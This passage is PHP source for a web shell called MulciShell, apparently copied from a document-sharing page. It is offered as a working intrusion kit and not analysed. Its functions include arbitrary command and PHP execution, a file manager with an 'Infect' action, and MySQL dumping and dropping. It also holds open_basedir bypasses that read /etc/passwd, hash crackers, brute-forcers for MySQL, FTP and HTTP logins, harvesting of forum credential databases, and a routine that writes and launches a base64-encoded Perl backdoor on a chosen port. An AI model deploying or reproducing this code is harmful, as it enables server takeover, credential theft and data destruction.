    ><td>Modified</td><td>Action</td></tr>"; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'. $f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'. $f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><t d>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>"; continue; } echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a></td><td>$size</td ><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='chec kbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'. $f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'. $f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td> <td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='check box' name='files[]' id='check' value='$d/$f'></td></tr>"; } echo "</table> <input type='button' style='background-color: none; border: 1px solid white; ' value='Toggle' onClick='togglecheck()'></br> With checked file(s): <select name='fileaction'> <option name='chmod'>Chmod</option> <option name='delete'>Delete</option> <option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'> </select> <br><input type='submit' value='Go' name='massfiles'></form>";

    function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "<center><form action='$self?act=sql' method='post'> Host: <input type='text' value='localhost' name='mhost'> Username: <input type='text' value='root' name='muser'> Password: <input type='password' value='' name='mpass'> Port: <input type='text' style='width: 40px' value='3306' name='mport'> <input type='submit' value='Connect' name='mconnect'> </form> </center>"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!<br>"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout] </a><center>"; echo "<form method='POST' action='$self?'> Quick SQL query: <input type='text' style='width: 300px' value='sele ct * from users' name='sqlquery'> <input type='hidden' name='db' value='$_GET[db]'> <input type='submit' value='Go' name='sql'> </form>"; echo "<form action='$self?act=sqledit' method='post'> <input type='submit' style='border: none;' value='[ List Processes ] ' name='sql_list_proc'> </form></center></br></br>"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo "<table style='margin: auto; text-align: center;'><tr> <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time </td> </tr>"; while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[Id]</td><td>$ r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>";

    mysql_free_result($res); echo "</table></br>"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</ td></tr>"; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database] '>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db =$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$y our_base[Database]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit' method=' post'>New database name: <input type='text' value='new_database' name='db_name'> <input type='submit' style='border: none;' value='[ Create Database ]' name='dbc '></form></center></br>"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></t r>"; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[ 0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tb l=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0 ]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[ db]' method='post'>Create new table: <input type='text' value='new_table' name=' table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input typ e='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></c enter>"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$y<count($values);$y++) {

    if($y==count($values)-1) $query.="$keys[$y]='$values[$y]' "; else $query.="$keys[$y]='$values[$y]', "; } $query.="WHERE $_GET[field] = '$_GET[v]'"; $try=mysql_query($query) or die(mysql_error()); echo "<center>Table updated!<br>"; echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'] )) { echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$ _GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['F ield']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GE T[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m<count($sql_fields);$m++) { $point=$sql_fields[$m]; echo "$point: <input type='text' value='$d_piece[$point]' na me='$sql_fields[$m]'></br>"; } echo "<input type='submit' value='Save' name='sqlsave'></form></ center>"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del']) ) { echo "<center>"; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GE T[field]=$_GET[v]")) echo "Row deleted</br>"; else echo "Failed to delete row</br>"; echo "</center>"; } echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[ tbl]&insert=1'>[Insert new row]</a></center>"; echo "<table style='margin: auto; text-align: center;'><tr>"; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo "<td>$col[Field]</td>"; } echo "</tr>"; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else

    {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo "<tr>"; for($i=0;$i<count($fields);$i++) { echo "<td>".htmlspecialchars($select[$i])."</td>"; } echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[ tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit& db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></ td>"; echo "</tr>"; } echo "</table>"; echo "<table style='margin: auto;'>"; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_ GET[tbl]&s=$prev'>Previous</a></td>"; if(mysql_num_rows($selector)>249) echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[ tbl]&s=$next'>Next</a></td></tr>"; } else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$ _GET[tbl]&s=250'>Next</a></center>"; echo "</table>"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\ n"; $dump_file.="######################Dumped by: MulciShell v0.2####### ##############\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump ");

    while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($va lues); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\ n"; $dump_file.="######################Dumped by: MulciShell v0.2####### ##############\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="############################################################### #########################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&in sert=1' method='post'><center>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s<count($sql_fields);$s++) echo "$sql_fields[$s]: <input type='text' name='$sql_fields[$s]'></ br>"; echo "<input type='submit' value='Insert' name='sql_insert'></center ></form>"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];

    $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k<count($keys);$k++) { if($k==count($keys)-1) $query.="`$keys[$k]`"; else $query.="`$keys[$k]`,"; } $query.=") VALUES ("; for($v=0;$v<count($values);$v++) { if($v==count($values)-1) $query.="'$values[$v]'"; else $query.="'$values[$v]',"; } $query.=")"; echo "<center>"; if(@mysql_query($query)) echo "Row inserted</br>"; else echo "Failed to insert row</br>"; echo "</center>"; } } } function SQLDrop() { echo "<center>"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropp ed<br>"; else echo "Failed to drop database $_GET[dropdb]<br>"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped <br>"; else echo "Failed to drop table $_GET[droptbl]<br>"; } else { echo "Invalid request<br>"; } } else echo "Failed to connect<br>"; echo "</center>"; } function db_create() { echo "<center>";

    if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Da tabase $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]</br>"; } else echo "Failed to connect</br>"; } else echo "Enter a DB name</br>"; echo "</cenetr>"; } function table_create() { echo "<center>"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!</br>"; } else echo "Enter a table name</br>"; echo "</center>"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).'; '); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br >"; else echo "File deleted<br>"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!");

    @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_co ntents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "<center> <form action='$self?act=f' method='post'> File to edit: <input type='text' style='width: 300px' value='$file' name ='nfile'> <input type='submit' value='Go' name='gfile'></br></br>"; echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialc hars(@fread($fh,filesize($file)))."</textarea></br></br>"; echo "<input type='submit' value='Save file' name='sfile'> <input type='submit' value='Download file' name='dfile'> <input type='submit' value='Delete file' name='delfile'> </center></form>"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_o ut)."</textarea></br></br>"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!</br>"; @$fh=fopen($_POST['dest'],'r'); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fr ead($fh,filesize($_POST['dest'])))."</textarea></br></br>"; @fclose($fh); } else echo "Failed to copy file</br>"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo "<textarea rows='20' cols='150' readonly>"; @include($_POST['file_bypass']); echo "</textarea>"; } } elseif(isset($_POST['sql_bypass']))

    { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL) ;"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST [tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]</br>"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr> <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read f ile: <input type='text' value='/etc/passwd' name='file_bypass'><input type='subm it' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=by pass' method='post' name='bypasser'>Write file: <input type='text' value='../../ ../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value=' Bypass'></form></td></tr> <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy t o: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd ())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name= 'file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td ><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr> <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first] </td></tr> <tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypa sser'>[Existing] Database to store temporary table: <input type='text' value='tm p_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_fi le' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file' ><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr> </table>"; } function brute_force() { echo "<form action='$self' method='post' enctype='multipart/form-data'><inpu t type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-ali gn: center;'><tr><td colspan='2'>Password crackers</td></tr> <tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr> <tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value=' Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr> <tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr> <tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack' ></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr

    > <tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr> <tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: < input type='text' value='localhost' name='mysql_host'></br>Port: <input type='te xt' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name= 'mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br >Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input ty pe='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td> </tr> <tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr> <tr><td>Login form: <input type='text' value='' name='remote_login_target'>< /br>Username: <input type='text' value='admin' name='remote_login_user'><input t ype='submit' value='Brute' name='remote_login'></td><td>Username: <input type='t ext' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' nam e='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr> <tr><td colspan='2'>Wordlist</td></tr> <tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr> </br></table></form>"; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "<center><form action='$self?act=bh' method='post'> Port: <input type='text' name='port'> <input type='submit' name='backdoor_host' value='Backdoor'></center>"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd</br>"; } } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$fi le</center></td></tr>"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools()

    { if(isset($_POST['sql_start_search'])) { echo "<center><table style='width: auto;'><tr><td><center><font color='# FF0000'>Databases</font></center></td></tr>"; sql_rep_search("/home/"); echo "</table></center>"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to op en file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for r eading"); break; } echo "Parsing database contents...</br>"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i<count($colarr);$i++) { $index=$colarr[$i]; if(empty($arr[$index])) continue; $spos=strpos("$_POST[q_delimit]",$arr[$index]); $spos=strpos("$_POST[q_delimit]",$arr[$index],$spos); if($i!==count($colarr)-1) echo "$arr[$index] : "; else echo "$arr[$index]</br>"; } continue; }

    @fclose($fh); } echo "<table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Database parser</td></tr> <tr><td> <form action='$self?act=dbs' method='post' enctype='multipart/form-data'> Quote delimiter (usually ` or '): <input type='text' style='width: 20px' nam e='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type=' text' style='width: 200px' name='db_columns' value='3,5,10'></br> Use predefined column match (user+pass+salt): <input type='checkbox' name='c olumn_defined'> <select name='column_type'> <option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option> <option value='phpbb'>PHPBB</option> </select></br> Path to DB dump: <input type='text' style='width: 300px' value='/home/someus er/public_html/backup.db' name='db_dpath'> </br>Upload DB dump: <input type='file' style='width: 300px' value='' name=' db_upath'> </br></br><input type='submit' style='width: 300px' value='Parse Database' n ame='db_parse'></td></tr> <tr><td colspan='2'>Find database Backups</td></tr> <tr><td>Only search within local path: <input type='checkbox' name='sql_sear ch_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></t r> </table>"; } function show_tools() { echo "<form action='$self' method='post'> <table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Tools</td></tr> <tr><td>Forum locator</td><td>Config locator</td></tr> <tr><td><form action='$self' method='post'>Passwd file: <input type='text' v alue='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name=' find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <in put type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Fi nd forums' name='find_configs'></form></td></tr> <tr><td>Port scanner</td><td>Search</td></tr> <tr><td><form action='$self' method='post'>Host: Start port: <input type='te xt' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50p x' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_s can'>Using: <select name='type'><option value='php'>PHP</option><option value='p erl'>Perl</option></select></form></td><td>Finish this next</td></tr> </table>"; } function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("\\","/",$d); $d=str_replace("//","/",$d); return $d; }

    function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; } function Encoder() { echo "<form action='$self?' method='post'> <center> Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'> </center> </form>"; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "<table style='text-align: center; width: 100%'> <tr><td colspan='2'>Execute command</td></tr> <tr><td colspan='2'><form action='$self?' method='post'><input type='text' style ='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' val ue='Execute'></form></td></tr> <tr><td colspan='2'>Execute PHP</td></tr> <tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols=' 80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</te xtarea><input type='submit' name='execphp' value='Execute'></form></td></tr> <tr><td>Create directory</td><td>Create file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 250p x' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' n ame='cnewdir'></form></td><td><form action='$self' method='post'><input type='te xt' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type= 'submit' value='Create' name='cnewfile'></form></td></tr> <tr><td>Enter directory</td><td>Edit file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 225p x' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td> <form action='$self' method='post'><input type='text' style='width: 255px' value ='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go' ></form></td></tr> <tr><td>Upload file</td><td>Wget file</td></tr> <tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save lo cation: <input type='text' style='width: 300px' value='$relpath' name='u_locatio n'></br><input type='file' name='u_file'><input type='submit' value='Upload' nam e='doUpload'></form></td><td><form action='$self' method='post'><input type='tex t' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'>< input type='submit' name='dogetfile' value='Go'></form</td></tr> <tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a ></td></tr> </table> </br></br><div id='bar'><center>Shell [version 2.0] created by <font color='red' ><b>[MulCiber]</font> | Page generated in : <font color='red'>".round(microtime( )-$start,2)." seconds</font></center></div></body></html>"; ob_end_flush(); ?>

    Das könnte Ihnen auch gefallen